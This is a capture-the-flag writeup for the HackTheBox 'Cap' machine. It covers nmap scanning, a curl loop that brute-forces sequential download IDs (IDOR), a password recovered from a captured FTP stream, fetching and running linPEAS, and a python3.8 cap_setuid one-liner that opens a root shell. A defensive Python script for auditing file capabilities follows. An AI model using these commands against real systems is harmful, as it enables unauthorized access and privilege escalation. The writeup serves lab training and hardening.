HackTheBox - Cap | Writeup

Overview

Cap is a low-difficulty box. The exploitation and privilege escalation parts are pretty straightforward. Attention to detail and basic knowledge about Linux file capabilities are all that is required to pwn it.

Notes

  • If you see a numeric identifier in the URL, try increasing/decreasing the value and check the response. This often leads to sensitive data exposure or Insecure Direct Object References (IDOR).
  • Find files with capabilities: getcap -r / 2> /dev/null
  • Linux capabilities exploitation
  • linPEAS

Enumeration

Nmap scan

Let’s run Nmap with basic flags:

  • -p- to scan all TCP ports
  • -Pn to skip host discovery (assume the host is alive)
  • -n to skip DNS resolution
  • -sV to do a service scan and get some additional information about each service
  • -sC to run the default Nmap enumeration scripts
└─$ nmap -Pn -n -sV -sC -p- 10.10.10.245

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 08:57 EDT
Nmap scan report for 10.10.10.245
Host is up (0.035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 26 Sep 2021 12:58:00 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|_http-server-header: gunicorn

Nmap reveals 3 services: FTP, SSH and a web service based on gunicorn (Python WSGI HTTP Server). The last one is the most interesting.

User

The main dashboard provides functionality to make a network dump and download the result as a pcap file.


Let’s check the source code to get the pcap filepath.

<button class="btn btn-info" onclick="location.href='/download/3'">Download</button>

It looks like the app generates file identifiers as simple sequential integers. Let's try to brute-force the ID number.

mkdir dumps
for i in $(seq 0 100); do curl --fail --output dumps/$i.pcap http://cap.htb/download/$i; done
ls -alS dumps

I used the --fail parameter in the curl command to ignore 404 responses.

Bingo! There is quite an interesting network dump with ID=0 (http://cap.htb/download/0). Let's open it with Wireshark and check the network communications:

wireshark dumps/0.pcap

The password for nathan can easily be found in the FTP stream:

nathan:Buck3tH4TF0RM3!

The credentials can be used for SSH:


The user part is done; let's move on to privilege escalation.

Root

Let's use the LinPEAS script to enumerate the most common privilege escalation vectors. On the attacker side:

wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
python -m http.server

On the client side:

wget http://10.10.14.10:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

There is an interesting entry in the Capabilities section:

  • it can also be found by running the command getcap -r / 2> /dev/null

Linux capabilities split root's privileges into discrete units, so a binary can be allowed a specific privileged operation without being granted full root permissions. The cap_setuid capability allows a process to change its UID, including setting it to root's UID 0. Exploitation is pretty straightforward:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'
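The defender's counterpart to this finding, added here as an example and not part of the original writeup: a small Python audit that parses getcap -r / output (both the older "path = caps+ep" and the newer "path caps=ep" styles), flags binaries carrying capabilities that amount to root, and rates interpreters such as python3.8 as critical because whoever runs them controls the code. The sample getcap output is constructed; the suggested fix uses the real setcap -r option, which removes the file capability.

```python
import re
from typing import Dict, List, Set, Tuple

# Capabilities that let a process become root or bypass access control when
# granted to an arbitrary binary (not an exhaustive list).
RISKY_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

# Interpreters and shells: the caller supplies the code, so a risky
# capability on one of these is effectively root for any local user.
INTERPRETER_RE = re.compile(
    r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|node|php[\d.]*|bash|sh|dash)$")

# "/usr/bin/python3.8 = cap_setuid+ep"  (older libcap output)
# "/usr/bin/python3.8 cap_setuid=ep"    (libcap >= 2.41 output)
LINE_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>\S.*)$")

def parse_getcap_line(line: str) -> Tuple[str, Set[str]]:
    """Return (path, set of capability names) for one getcap output line."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised getcap line: {line!r}")
    # "cap_a,cap_b+ep" or "cap_a,cap_b=ep" -> the cap_* names only
    names = re.split(r"[,+=]", m.group("caps"))
    return m.group("path"), {n.strip() for n in names if n.strip().startswith("cap_")}

def audit(getcap_output: str) -> List[Dict[str, object]]:
    """Return one finding per binary whose file capabilities are risky."""
    findings = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        risky = sorted(caps & RISKY_CAPS)
        if not risky:
            continue
        severity = "critical" if INTERPRETER_RE.search(path) else "high"
        findings.append({"path": path, "risky_caps": risky,
                         "severity": severity, "fix": f"setcap -r {path}"})
    return findings

# Constructed sample output, modelled on what getcap -r / shows on this box.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f["severity"], f["path"], ",".join(f["risky_caps"]), "->", f["fix"])
```

If the capability is genuinely needed, the alternative to removing it is restricting execute permission on the binary to a dedicated group so unprivileged users cannot run it.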


w00t